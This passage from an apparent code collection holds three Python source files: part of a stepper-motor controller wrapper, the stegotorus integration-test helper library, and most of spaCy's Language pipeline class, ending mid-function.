"""Stop the motor abruptly without respecting the deceleration limit and sets the current position."""
self._ticcmd('--halt-and-set-position', str(int(position)))
def rotate_to_position(self, position):
"""Tells the TIC to move the stepper to the target position.
Args:
position (number): The desired position in microsteps
"""
self._ticcmd('--position', str(int(position)))
def rotate_by_velocity(self, velocity):
"""Tells the TIC to move the stepper continuously at the specified velocity.
Args:
velocity (number): The desired speed in microsteps per 10,000 s
"""
self._ticcmd('--velocity', str(int(velocity)))
def reset_command_timeout(self):
"""Tells the TIC to reset the internal command timeout."""
self._ticcmd('--reset-command-timeout')
def exit_safe_start(self):
"""Tells the TIC to exit the safe start mode."""
self._ticcmd('--exit-safe-start')
def set_step_mode(self, mode):
"""Set the Step Mode of the stepper.
Args:
mode (number): One of 1, 2, 4, 8, 16, 32, the number of microsteps per step
"""
self._ticcmd('--step-mode', str(int(mode)))
def set_max_speed(self, speed):
"""Set the max speed of the stepper.
Args:
speed (number): The maximum speed of the stepper in microsteps per 10,000s
"""
self._ticcmd('--max-speed', str(int(speed)))
def set_starting_speed(self, speed):
"""Set the starting speed of the stepper.
Args:
speed (number): The starting speed of the stepper in microsteps per 10,000s
"""
self._ticcmd('--starting-speed', str(int(speed)))
def set_max_acceleration(self, acceleration):
"""Set the max acceleration of the stepper.
Args:
acceleration (number): The maximum acceleration of the stepper in microsteps per 100 s^2
"""
self._ticcmd('--max-accel', str(int(acceleration)))
def set_max_deceleration(self, deceleration):
"""Set the max deceleration of the stepper.
Args:
deceleration (number): The maximum deceleration of the stepper in microsteps per 100 s^2
"""
self._ticcmd('--max-decel', str(int(deceleration)))
def set_current_limit(self, current):
"""Set the max current of the stepper driver.
Args:
current (number): The maximum current of the stepper in milliamps
"""
self._ticcmd('--current', str(int(current)))
def energize(self):
"""Energize the Stepper."""
self._ticcmd('--energize')
def go_home(self, forward):
"""Energize the Stepper."""
if forward:
direction = "fwd"
else:
direction = "rev"
self._ticcmd('--home {}'.format(direction))
|
itestlib.py
|
# Copyright 2011, 2012 SRI International
# See LICENSE for other credits and copying information
# Integration tests for stegotorus - library routines.
import difflib
import errno
import os
import re
import shlex
import socket
import subprocess
import threading
import time
TIMEOUT_LEN = 5 # seconds
# Helper: stick "| " at the beginning of each line of |s|.
def indent(s):
return "| " + "\n| ".join(s.strip().split("\n"))
# Helper: generate unified-format diffs between two named strings.
# Pythonic escaped-string syntax is used for unprintable characters.
def diff(label, expected, received):
if expected == received:
return ""
else:
return (label + "\n| "
+ "\n| ".join(s.encode("string_escape")
for s in
difflib.unified_diff(expected.split("\n"),
received.split("\n"),
"expected", "received",
lineterm=""))
+ "\n")
# Helper: Run stegotorus instances and confirm that they have
# completed without any errors.
# set MALLOC_CHECK_ in subprocess environment; this gets us
# better memory-error behavior from glibc and is harmless
# elsewhere. Mode 2 is "abort immediately, without flooding
# /dev/tty with useless diagnostics" (the documentation SAYS
# they go to stderr, but they don't).
stegotorus_env = {}
stegotorus_env.update(os.environ)
stegotorus_env['MALLOC_CHECK_'] = '2'
# check for a grinder
if 'GRINDER' in stegotorus_env:
stegotorus_grindv = shlex.split(stegotorus_env['GRINDER'])
else:
stegotorus_grindv = []
class Stegotorus(subprocess.Popen):
def __init__(self, *args, **kwargs):
argv = stegotorus_grindv[:]
argv.extend(("./stegotorus", "--log-min-severity=debug",
"--timestamp-logs"))
if len(args) == 1 and (isinstance(args[0], list) or
isinstance(args[0], tuple)):
argv.extend(args[0])
else:
argv.extend(args)
subprocess.Popen.__init__(self, argv,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=stegotorus_env,
close_fds=True,
**kwargs)
# wait for startup completion, which is signaled by
# the subprocess closing its stdout
self.output = self.stdout.read()
# read stderr in a separate thread, since we will
# have several processes outstanding at the same time
self.communicator = threading.Thread(target=self.run_communicate)
self.communicator.start()
self.timeout = threading.Timer(TIMEOUT_LEN, self.stop)
self.timeout.start()
severe_error_re = re.compile(
r"\[(?:warn|err(?:or)?)\]|ERROR SUMMARY: [1-9]|LEAK SUMMARY:")
def stop(self):
if self.poll() is None:
self.terminate()
def run_communicate(self):
self.errput = self.stderr.read()
def check_completion(self, label, force_stderr=False):
self.stdin.close()
self.communicator.join()
if self.poll() is not None:
self.timeout.cancel()
self.timeout.join()
self.wait()
report = ""
# exit status should be zero
if self.returncode > 0:
report += label + " exit code: %d\n" % self.returncode
elif self.returncode < 0:
report += label + " killed: signal %d\n" % -self.returncode
# there should be nothing on stdout
if self.output != "":
report += label + " stdout:\n%s\n" % indent(self.output)
# there will be debugging messages on stderr, but there should be
# no [warn], [err], or [error] messages.
if (force_stderr or
self.severe_error_re.search(self.errput) or
self.returncode != 0):
report += label + " stderr:\n%s\n" % indent(self.errput)
return report
# As above, but for the 'tltester' test helper rather than for
# stegotorus itself.
class Tltester(subprocess.Popen):
def __init__(self, timeline, extra_args=(), **kwargs):
argv = ["./tltester"]
argv.extend(extra_args)
subprocess.Popen.__init__(self, argv,
stdin=open(timeline, "rU"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=stegotorus_env,
close_fds=True,
**kwargs)
# invoke communicate() in a separate thread, since we will
# have several processes outstanding at the same time
self.communicator = threading.Thread(target=self.run_communicate)
self.communicator.start()
self.timeout = threading.Timer(TIMEOUT_LEN, self.stop)
self.timeout.start()
def stop(self):
if self.poll() is None:
self.terminate()
def run_communicate(self):
(out, err) = self.communicate()
self.output = out
self.errput = err
def check_completion(self, label):
self.communicator.join()
self.timeout.cancel()
self.timeout.join()
self.poll()
# exit status should be zero, and there should be nothing on
# stderr
if self.returncode != 0 or self.errput != "":
report = ""
# exit status should be zero
if self.returncode > 0:
report += label + " exit code: %d\n" % self.returncode
elif self.returncode < 0:
report += label + " killed: signal %d\n" % -self.returncode
if self.errput != "":
report += label + " stderr:\n%s\n" % indent(self.errput)
raise AssertionError(report)
# caller will crunch the output
return self.output
|
language.py
|
# coding: utf8
from __future__ import absolute_import, unicode_literals
import atexit
import random
import itertools
from warnings import warn
from spacy.util import minibatch
import weakref
import functools
from collections import OrderedDict
from contextlib import contextmanager
from copy import copy, deepcopy
from thinc.neural import Model
import srsly
import multiprocessing as mp
from itertools import chain, cycle
from .tokenizer import Tokenizer
from .vocab import Vocab
from .lemmatizer import Lemmatizer
from .lookups import Lookups
from .pipeline import DependencyParser, Tagger
from .pipeline import Tensorizer, EntityRecognizer, EntityLinker
from .pipeline import SimilarityHook, TextCategorizer, Sentencizer
from .pipeline import merge_noun_chunks, merge_entities, merge_subtokens
from .pipeline import EntityRuler
from .pipeline import Morphologizer
from .compat import izip, basestring_, is_python2
from .gold import GoldParse
from .scorer import Scorer
from ._ml import link_vectors_to_models, create_default_optimizer
from .attrs import IS_STOP, LANG
from .lang.punctuation import TOKENIZER_PREFIXES, TOKENIZER_SUFFIXES
from .lang.punctuation import TOKENIZER_INFIXES
from .lang.tokenizer_exceptions import TOKEN_MATCH
from .lang.tag_map import TAG_MAP
from .tokens import Doc
from .lang.lex_attrs import LEX_ATTRS, is_stop
from .errors import Errors, Warnings, deprecation_warning, user_warning
from . import util
from . import about
class BaseDefaults(object):
@classmethod
def create_lemmatizer(cls, nlp=None, lookups=None):
if lookups is None:
lookups = cls.create_lookups(nlp=nlp)
return Lemmatizer(lookups=lookups)
@classmethod
def create_lookups(cls, nlp=None):
root = util.get_module_path(cls)
filenames = {name: root / filename for name, filename in cls.resources}
if LANG in cls.lex_attr_getters:
lang = cls.lex_attr_getters[LANG](None)
user_lookups = util.get_entry_point(util.ENTRY_POINTS.lookups, lang, {})
filenames.update(user_lookups)
lookups = Lookups()
for name, filename in filenames.items():
data = util.load_language_data(filename)
lookups.add_table(name, data)
return lookups
@classmethod
def create_vocab(cls, nlp=None):
lookups = cls.create_lookups(nlp)
lemmatizer = cls.create_lemmatizer(nlp, lookups=lookups)
lex_attr_getters = dict(cls.lex_attr_getters)
# This is messy, but it's the minimal working fix to Issue #639.
lex_attr_getters[IS_STOP] = functools.partial(is_stop, stops=cls.stop_words)
vocab = Vocab(
lex_attr_getters=lex_attr_getters,
tag_map=cls.tag_map,
lemmatizer=lemmatizer,
lookups=lookups,
)
for tag_str, exc in cls.morph_rules.items():
for orth_str, attrs in exc.items():
vocab.morphology.add_special_case(tag_str, orth_str, attrs)
return vocab
@classmethod
def create_tokenizer(cls, nlp=None):
rules = cls.tokenizer_exceptions
token_match = cls.token_match
prefix_search = (
util.compile_prefix_regex(cls.prefixes).search if cls.prefixes else None
)
suffix_search = (
util.compile_suffix_regex(cls.suffixes).search if cls.suffixes else None
)
infix_finditer = (
util.compile_infix_regex(cls.infixes).finditer if cls.infixes else None
)
vocab = nlp.vocab if nlp is not None else cls.create_vocab(nlp)
return Tokenizer(
vocab,
rules=rules,
prefix_search=prefix_search,
suffix_search=suffix_search,
infix_finditer=infix_finditer,
token_match=token_match,
)
pipe_names = ["tagger", "parser", "ner"]
token_match = TOKEN_MATCH
prefixes = tuple(TOKENIZER_PREFIXES)
suffixes = tuple(TOKENIZER_SUFFIXES)
infixes = tuple(TOKENIZER_INFIXES)
tag_map = dict(TAG_MAP)
tokenizer_exceptions = {}
stop_words = set()
lemma_rules = {}
lemma_exc = {}
lemma_index = {}
lemma_lookup = {}
morph_rules = {}
lex_attr_getters = LEX_ATTRS
syntax_iterators = {}
resources = {}
writing_system = {"direction": "ltr", "has_case": True, "has_letters": True}
single_orth_variants = []
paired_orth_variants = []
class Language(object):
"""A text-processing pipeline. Usually you'll load this once per process,
and pass the instance around your application.
Defaults (class): Settings, data and factory methods for creating the `nlp`
object and processing pipeline.
lang (unicode): Two-letter language ID, i.e. ISO code.
DOCS: https://spacy.io/api/language
"""
Defaults = BaseDefaults
lang = None
factories = {
"tokenizer": lambda nlp: nlp.Defaults.create_tokenizer(nlp),
"tensorizer": lambda nlp, **cfg: Tensorizer(nlp.vocab, **cfg),
"tagger": lambda nlp, **cfg: Tagger(nlp.vocab, **cfg),
"morphologizer": lambda nlp, **cfg: Morphologizer(nlp.vocab, **cfg),
"parser": lambda nlp, **cfg: DependencyParser(nlp.vocab, **cfg),
"ner": lambda nlp, **cfg: EntityRecognizer(nlp.vocab, **cfg),
"entity_linker": lambda nlp, **cfg: EntityLinker(nlp.vocab, **cfg),
"similarity": lambda nlp, **cfg: SimilarityHook(nlp.vocab, **cfg),
"textcat": lambda nlp, **cfg: TextCategorizer(nlp.vocab, **cfg),
"sentencizer": lambda nlp, **cfg: Sentencizer(**cfg),
"merge_noun_chunks": lambda nlp, **cfg: merge_noun_chunks,
"merge_entities": lambda nlp, **cfg: merge_entities,
"merge_subtokens": lambda nlp, **cfg: merge_subtokens,
"entity_ruler": lambda nlp, **cfg: EntityRuler(nlp, **cfg),
}
def __init__(
self, vocab=True, make_doc=True, max_length=10 ** 6, meta={}, **kwargs
):
"""Initialise a Language object.
vocab (Vocab): A `Vocab` object. If `True`, a vocab is created via
`Language.Defaults.create_vocab`.
make_doc (callable): A function that takes text and returns a `Doc`
object. Usually a `Tokenizer`.
meta (dict): Custom meta data for the Language class. Is written to by
models to add model meta data.
max_length (int) :
Maximum number of characters in a single text. The current v2 models
may run out memory on extremely long texts, due to large internal
allocations. You should segment these texts into meaningful units,
e.g. paragraphs, subsections etc, before passing them to spaCy.
Default maximum length is 1,000,000 characters (1mb). As a rule of
thumb, if all pipeline components are enabled, spaCy's default
models currently requires roughly 1GB of temporary memory per
100,000 characters in one text.
RETURNS (Language): The newly constructed object.
"""
user_factories = util.get_entry_points(util.ENTRY_POINTS.factories)
self.factories.update(user_factories)
self._meta = dict(meta)
self._path = None
if vocab is True:
factory = self.Defaults.create_vocab
vocab = factory(self, **meta.get("vocab", {}))
if vocab.vectors.name is None:
vocab.vectors.name = meta.get("vectors", {}).get("name")
else:
if (self.lang and vocab.lang) and (self.lang != vocab.lang):
raise ValueError(Errors.E150.format(nlp=self.lang, vocab=vocab.lang))
self.vocab = vocab
if make_doc is True:
factory = self.Defaults.create_tokenizer
make_doc = factory(self, **meta.get("tokenizer", {}))
self.tokenizer = make_doc
self.pipeline = []
self.max_length = max_length
self._optimizer = None
@property
def path(self):
return self._path
@property
def meta(self):
if self.vocab.lang:
self._meta.setdefault("lang", self.vocab.lang)
else:
self._meta.setdefault("lang", self.lang)
self._meta.setdefault("name", "model")
self._meta.setdefault("version", "0.0.0")
self._meta.setdefault("spacy_version", ">={}".format(about.__version__))
self._meta.setdefault("description", "")
self._meta.setdefault("author", "")
self._meta.setdefault("email", "")
self._meta.setdefault("url", "")
self._meta.setdefault("license", "")
self._meta["vectors"] = {
"width": self.vocab.vectors_length,
"vectors": len(self.vocab.vectors),
"keys": self.vocab.vectors.n_keys,
"name": self.vocab.vectors.name,
}
self._meta["pipeline"] = self.pipe_names
self._meta["labels"] = self.pipe_labels
return self._meta
@meta.setter
def meta(self, value):
self._meta = value
# Conveniences to access pipeline components
# Shouldn't be used anymore!
@property
def tensorizer(self):
return self.get_pipe("tensorizer")
@property
def tagger(self):
return self.get_pipe("tagger")
@property
def parser(self):
return self.get_pipe("parser")
@property
def entity(self):
return self.get_pipe("ner")
@property
def linker(self):
return self.get_pipe("entity_linker")
@property
def matcher(self):
return self.get_pipe("matcher")
@property
def pipe_names(self):
"""Get names of available pipeline components.
RETURNS (list): List of component name strings, in order.
"""
return [pipe_name for pipe_name, _ in self.pipeline]
@property
def pipe_labels(self):
"""Get the labels set by the pipeline components, if available (if
the component exposes a labels property).
RETURNS (dict): Labels keyed by component name.
"""
labels = OrderedDict()
for name, pipe in self.pipeline:
if hasattr(pipe, "labels"):
labels[name] = list(pipe.labels)
return labels
def get_pipe(self, name):
"""Get a pipeline component for a given component name.
name (unicode): Name of pipeline component to get.
RETURNS (callable): The pipeline component.
DOCS: https://spacy.io/api/language#get_pipe
"""
for pipe_name, component in self.pipeline:
if pipe_name == name:
return component
raise KeyError(Errors.E001.format(name=name, opts=self.pipe_names))
def create_pipe(self, name, config=dict()):
"""Create a pipeline component from a factory.
name (unicode): Factory name to look up in `Language.factories`.
config (dict): Configuration parameters to initialise component.
RETURNS (callable): Pipeline component.
DOCS: https://spacy.io/api/language#create_pipe
"""
if name not in self.factories:
if name == "sbd":
raise KeyError(Errors.E108.format(name=name))
else:
raise KeyError(Errors.E002.format(name=name))
factory = self.factories[name]
return factory(self, **config)
def add_pipe(
self, component, name=None, before=None, after=None, first=None, last=None
):
"""Add a component to the processing pipeline. Valid components are
callables that take a `Doc` object, modify it and return it. Only one
of before/after/first/last can be set. Default behaviour is "last".
component (callable): The pipeline component.
name (unicode): Name of pipeline component. Overwrites existing
component.name attribute if available. If no name is set and
the component exposes no name attribute, component.__name__ is
used. An error is raised if a name already exists in the pipeline.
before (unicode): Component name to insert component directly before.
after (unicode): Component name to insert component directly after.
first (bool): Insert component first / not first in the pipeline.
last (bool): Insert component last / not last in the pipeline.
DOCS: https://spacy.io/api/language#add_pipe
"""
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E004.format(component=component)
raise ValueError(msg)
if name is None:
if hasattr(component, "name"):
name = component.name
elif hasattr(component, "__name__"):
name = component.__name__
elif hasattr(component, "__class__") and hasattr(
component.__class__, "__name__"
):
name = component.__class__.__name__
else:
name = repr(component)
if name in self.pipe_names:
raise ValueError(Errors.E007.format(name=name, opts=self.pipe_names))
if sum([bool(before), bool(after), bool(first), bool(last)]) >= 2:
raise ValueError(Errors.E006)
pipe = (name, component)
if last or not any([first, before, after]):
self.pipeline.append(pipe)
elif first:
self.pipeline.insert(0, pipe)
elif before and before in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(before), pipe)
elif after and after in self.pipe_names:
self.pipeline.insert(self.pipe_names.index(after) + 1, pipe)
else:
raise ValueError(
Errors.E001.format(name=before or after, opts=self.pipe_names)
)
def has_pipe(self, name):
"""Check if a component name is present in the pipeline. Equivalent to
`name in nlp.pipe_names`.
name (unicode): Name of the component.
RETURNS (bool): Whether a component of the name exists in the pipeline.
DOCS: https://spacy.io/api/language#has_pipe
"""
return name in self.pipe_names
def replace_pipe(self, name, component):
"""Replace a component in the pipeline.
name (unicode): Name of the component to replace.
component (callable): Pipeline component.
DOCS: https://spacy.io/api/language#replace_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
if not hasattr(component, "__call__"):
msg = Errors.E003.format(component=repr(component), name=name)
if isinstance(component, basestring_) and component in self.factories:
msg += Errors.E135.format(name=name)
raise ValueError(msg)
self.pipeline[self.pipe_names.index(name)] = (name, component)
def rename_pipe(self, old_name, new_name):
"""Rename a pipeline component.
old_name (unicode): Name of the component to rename.
new_name (unicode): New name of the component.
DOCS: https://spacy.io/api/language#rename_pipe
"""
if old_name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=old_name, opts=self.pipe_names))
if new_name in self.pipe_names:
raise ValueError(Errors.E007.format(name=new_name, opts=self.pipe_names))
i = self.pipe_names.index(old_name)
self.pipeline[i] = (new_name, self.pipeline[i][1])
def remove_pipe(self, name):
"""Remove a component from the pipeline.
name (unicode): Name of the component to remove.
RETURNS (tuple): A `(name, component)` tuple of the removed component.
DOCS: https://spacy.io/api/language#remove_pipe
"""
if name not in self.pipe_names:
raise ValueError(Errors.E001.format(name=name, opts=self.pipe_names))
return self.pipeline.pop(self.pipe_names.index(name))
def __call__(self, text, disable=[], component_cfg=None):
"""Apply the pipeline to some text. The text can span multiple sentences,
and can contain arbtrary whitespace. Alignment into the original string
is preserved.
text (unicode): The text to be processed.
disable (list): Names of the pipeline components to disable.
component_cfg (dict): An optional dictionary with extra keyword arguments
for specific components.
RETURNS (Doc): A container for accessing the annotations.
DOCS: https://spacy.io/api/language#call
"""
if len(text) > self.max_length:
raise ValueError(
Errors.E088.format(length=len(text), max_length=self.max_length)
)
doc = self.make_doc(text)
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if name in disable:
continue
if not hasattr(proc, "__call__"):
raise ValueError(Errors.E003.format(component=type(proc), name=name))
doc = proc(doc, **component_cfg.get(name, {}))
if doc is None:
raise ValueError(Errors.E005.format(name=name))
return doc
def disable_pipes(self, *names):
"""Disable one or more pipeline components. If used as a context
manager, the pipeline will be restored to the initial state at the end
of the block. Otherwise, a DisabledPipes object is returned, that has
a `.restore()` method you can use to undo your changes.
DOCS: https://spacy.io/api/language#disable_pipes
"""
return DisabledPipes(self, *names)
def make_doc(self, text):
return self.tokenizer(text)
def _format_docs_and_golds(self, docs, golds):
"""Format golds and docs before update models."""
expected_keys = ("words", "tags", "heads", "deps", "entities", "cats", "links")
gold_objs = []
doc_objs = []
for doc, gold in zip(docs, golds):
if isinstance(doc, basestring_):
doc = self.make_doc(doc)
if not isinstance(gold, GoldParse):
unexpected = [k for k in gold if k not in expected_keys]
if unexpected:
err = Errors.E151.format(unexp=unexpected, exp=expected_keys)
raise ValueError(err)
gold = GoldParse(doc, **gold)
doc_objs.append(doc)
gold_objs.append(gold)
return doc_objs, gold_objs
def update(self, docs, golds, drop=0.0, sgd=None, losses=None, component_cfg=None):
"""Update the models in the pipeline.
docs (iterable): A batch of `Doc` objects.
golds (iterable): A batch of `GoldParse` objects.
drop (float): The droput rate.
sgd (callable): An optimizer.
losses (dict): Dictionary to update with the loss, keyed by component.
component_cfg (dict): Config parameters for specific pipeline
components, keyed by component name.
DOCS: https://spacy.io/api/language#update
"""
if len(docs) != len(golds):
raise IndexError(Errors.E009.format(n_docs=len(docs), n_golds=len(golds)))
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
# Allow dict of args to GoldParse, instead of GoldParse objects.
docs, golds = self._format_docs_and_golds(docs, golds)
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
pipes = list(self.pipeline)
random.shuffle(pipes)
if component_cfg is None:
component_cfg = {}
for name, proc in pipes:
if not hasattr(proc, "update"):
continue
grads = {}
kwargs = component_cfg.get(name, {})
kwargs.setdefault("drop", drop)
proc.update(docs, golds, sgd=get_grads, losses=losses, **kwargs)
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
def rehearse(self, docs, sgd=None, losses=None, config=None):
"""Make a "rehearsal" update to the models in the pipeline, to prevent
forgetting. Rehearsal updates run an initial copy of the model over some
data, and update the model so its current predictions are more like the
initial ones. This is useful for keeping a pretrained model on-track,
even if you're updating it with a smaller set of examples.
docs (iterable): A batch of `Doc` objects.
drop (float): The droput rate.
sgd (callable): An optimizer.
RETURNS (dict): Results from the update.
EXAMPLE:
>>> raw_text_batches = minibatch(raw_texts)
>>> for labelled_batch in minibatch(zip(train_docs, train_golds)):
>>> docs, golds = zip(*train_docs)
>>> nlp.update(docs, golds)
>>> raw_batch = [nlp.make_doc(text) for text in next(raw_text_batches)]
>>> nlp.rehearse(raw_batch)
"""
# TODO: document
if len(docs) == 0:
return
if sgd is None:
if self._optimizer is None:
self._optimizer = create_default_optimizer(Model.ops)
sgd = self._optimizer
docs = list(docs)
for i, doc in enumerate(docs):
if isinstance(doc, basestring_):
docs[i] = self.make_doc(doc)
pipes = list(self.pipeline)
random.shuffle(pipes)
if config is None:
config = {}
grads = {}
def get_grads(W, dW, key=None):
grads[key] = (W, dW)
get_grads.alpha = sgd.alpha
get_grads.b1 = sgd.b1
get_grads.b2 = sgd.b2
for name, proc in pipes:
if not hasattr(proc, "rehearse"):
continue
grads = {}
proc.rehearse(docs, sgd=get_grads, losses=losses, **config.get(name, {}))
for key, (W, dW) in grads.items():
sgd(W, dW, key=key)
return losses
def preprocess_gold(self, docs_golds):
"""Can be called before training to pre-process gold data. By default,
it handles nonprojectivity and adds missing tags to the tag map.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
YIELDS (tuple): Tuples of preprocessed `Doc` and `GoldParse` objects.
"""
for name, proc in self.pipeline:
if hasattr(proc, "preprocess_gold"):
docs_golds = proc.preprocess_gold(docs_golds)
for doc, gold in docs_golds:
yield doc, gold
def begin_training(self, get_gold_tuples=None, sgd=None, component_cfg=None, **cfg):
"""Allocate models, pre-process training data and acquire a trainer and
optimizer. Used as a contextmanager.
get_gold_tuples (function): Function returning gold data
component_cfg (dict): Config parameters for specific components.
**cfg: Config parameters.
RETURNS: An optimizer.
DOCS: https://spacy.io/api/language#begin_training
"""
if get_gold_tuples is None:
get_gold_tuples = lambda: []
# Populate vocab
else:
for _, annots_brackets in get_gold_tuples():
_ = annots_brackets.pop()
for annots, _ in annots_brackets:
for word in annots[1]:
_ = self.vocab[word] # noqa: F841
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
if component_cfg is None:
component_cfg = {}
for name, proc in self.pipeline:
if hasattr(proc, "begin_training"):
kwargs = component_cfg.get(name, {})
kwargs.update(cfg)
proc.begin_training(
get_gold_tuples,
pipeline=self.pipeline,
sgd=self._optimizer,
**kwargs
)
return self._optimizer
def resume_training(self, sgd=None, **cfg):
"""Continue training a pretrained model.
Create and return an optimizer, and initialize "rehearsal" for any pipeline
component that has a .rehearse() method. Rehearsal is used to prevent
models from "forgetting" their initialised "knowledge". To perform
rehearsal, collect samples of text you want the models to retain performance
on, and call nlp.rehearse() with a batch of Doc objects.
"""
if cfg.get("device", -1) >= 0:
util.use_gpu(cfg["device"])
if self.vocab.vectors.data.shape[1] >= 1:
self.vocab.vectors.data = Model.ops.asarray(self.vocab.vectors.data)
link_vectors_to_models(self.vocab)
if self.vocab.vectors.data.shape[1]:
cfg["pretrained_vectors"] = self.vocab.vectors.name
if sgd is None:
sgd = create_default_optimizer(Model.ops)
self._optimizer = sgd
for name, proc in self.pipeline:
if hasattr(proc, "_rehearsal_model"):
proc._rehearsal_model = deepcopy(proc.model)
return self._optimizer
def evaluate(
self, docs_golds, verbose=False, batch_size=256, scorer=None, component_cfg=None
):
"""Evaluate a model's pipeline components.
docs_golds (iterable): Tuples of `Doc` and `GoldParse` objects.
verbose (bool): Print debugging information.
batch_size (int): Batch size to use.
scorer (Scorer): Optional `Scorer` to use. If not passed in, a new one
will be created.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
RETURNS (Scorer): The scorer containing the evaluation results.
DOCS: https://spacy.io/api/language#evaluate
"""
if scorer is None:
scorer = Scorer(pipeline=self.pipeline)
if component_cfg is None:
component_cfg = {}
docs, golds = zip(*docs_golds)
docs = [
self.make_doc(doc) if isinstance(doc, basestring_) else doc for doc in docs
]
golds = list(golds)
for name, pipe in self.pipeline:
kwargs = component_cfg.get(name, {})
kwargs.setdefault("batch_size", batch_size)
if not hasattr(pipe, "pipe"):
docs = _pipe(pipe, docs, kwargs)
else:
docs = pipe.pipe(docs, **kwargs)
for doc, gold in zip(docs, golds):
if not isinstance(gold, GoldParse):
gold = GoldParse(doc, **gold)
if verbose:
print(doc)
kwargs = component_cfg.get("scorer", {})
kwargs.setdefault("verbose", verbose)
scorer.score(doc, gold, **kwargs)
return scorer
@contextmanager
def use_params(self, params, **cfg):
"""Replace weights of models in the pipeline with those provided in the
params dictionary. Can be used as a contextmanager, in which case,
models go back to their original weights after the block.
params (dict): A dictionary of parameters keyed by model ID.
**cfg: Config parameters.
EXAMPLE:
>>> with nlp.use_params(optimizer.averages):
>>> nlp.to_disk('/tmp/checkpoint')
"""
contexts = [
pipe.use_params(params)
for name, pipe in self.pipeline
if hasattr(pipe, "use_params")
]
# TODO: Having trouble with contextlib
# Workaround: these aren't actually context managers atm.
for context in contexts:
try:
next(context)
except StopIteration:
pass
yield
for context in contexts:
try:
next(context)
except StopIteration:
pass
def pipe(
self,
texts,
as_tuples=False,
n_threads=-1,
batch_size=1000,
disable=[],
cleanup=False,
component_cfg=None,
n_process=1,
):
"""Process texts as a stream, and yield `Doc` objects in order.
texts (iterator): A sequence of texts to process.
as_tuples (bool): If set to True, inputs should be a sequence of
(text, context) tuples. Output will then be a sequence of
(doc, context) tuples. Defaults to False.
batch_size (int): The number of texts to buffer.
disable (list): Names of the pipeline components to disable.
cleanup (bool): If True, unneeded strings are freed to control memory
use. Experimental.
component_cfg (dict): An optional dictionary with extra keyword
arguments for specific components.
n_process (int): Number of processors to process texts, only supported in Python3. If -1, set `multiprocessing.cpu_count()`.
YIELDS (Doc): Documents in the order of the original text.
DOCS: https://spacy.io/api/language#pipe
"""
# raw_texts will be used later to stop iterator.
texts, raw_texts = itertools.tee(texts)
if is_python2 and n_process != 1:
user_warning(Warnings.W023)
n_process = 1
if n_threads != -1:
deprecation_warning(Warnings.W016)
if n_process == -1:
n_process = mp.cpu_count()
if as_tuples:
text_context1, text_context2 = itertools.tee(texts)
texts = (tc[0] for tc in text_context1)
contexts = (tc[1] for tc in text_context2)
docs = self.pipe(
texts,
batch_size=batch_size,
disable=disable,
component_cfg=component_cfg,
)
for doc, context in izip(docs, contexts):
yield (doc, context)
return
if component_cfg is None:
component_cfg = {}
pipes = (
[]
) # contains functools.partial objects so that easily create multiprocess worker.
for name, proc in self.pipeline:
if name in disable:
continue
kwargs = component_cfg.get(name, {})
# Allow component_cfg to overwrite the top-level kwargs.
kwargs.setdefault("batch_size", batch_size)
if hasattr(proc, "pipe"):
f = functools.partial(proc.pipe, **kwargs)
else:
# Apply the function, but yield the doc
f = functools.partial(_pipe, proc=proc, kwargs=kwargs)
pipes.append(f)
if n_process != 1:
docs = self._multiprocessing_pipe(texts, pipes, n_process, batch_size)
else:
# if n_process == 1, no processes are forked.
docs = (self.make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
# Track weakrefs of "recent" documents, so that we can see when they
# expire from memory. When they do, we know we don't need old strings.
# This way, we avoid maintaining an unbounded growth in string entries
# in the string store.
recent_refs = weakref.WeakSet()
old_refs = weakref.WeakSet()
# Keep track of the original string data, so that if we flush old strings,
# we can recover the original ones. However, we only want to do this if we're
# really adding strings, to save up-front costs.
original_strings_data = None
nr_seen = 0
for doc in docs:
yield doc
if cleanup:
recent_refs.add(doc)
if nr_seen < 10000:
old_refs.add(doc)
nr_seen += 1
elif len(old_refs) == 0:
old_refs, recent_refs = recent_refs, old_refs
if original_strings_data is None:
original_strings_data = list(self.vocab.strings)
else:
keys, strings = self.vocab.strings._cleanup_stale_strings(
original_strings_data
)
self.vocab._reset_cache(keys, strings)
self.tokenizer._reset_cache(keys)
nr_seen = 0
def _multiprocessing_pipe(self, texts, pipes, n_process, batch_size):
# raw_texts is used later to stop iteration.
texts, raw_texts = itertools.tee(texts)
# for sending texts to worker
texts_q = [mp.Queue() for _ in range(n_process)]
# for receiving byte encoded docs from worker
bytedocs_recv_ch, bytedocs_send_ch = zip(
*[mp.Pipe(False) for _ in range(n_process)]
)
batch_texts = minibatch(texts, batch_size)
# Sender sends texts to the workers.
# This is necessary to properly handle infinite length of texts.
# (In this case, all data cannot be sent to the workers at once)
sender = _Sender(batch_texts, texts_q, chunk_size=n_process)
# send twice so that make process busy
sender.send()
sender.send()
procs = [
mp.Process(target=_apply_pipes, args=(self.make_doc, pipes, rch, sch))
for rch, sch in zip(texts_q, bytedocs_send_ch)
]
for proc in procs:
proc.start()
# Cycle channels not to break the order of docs.
# The received object is batch of byte encoded docs, so flatten them with chain.from_iterable.
byte_docs = chain.from_iterable(recv.recv() for recv in cycle(bytedocs_recv_ch))
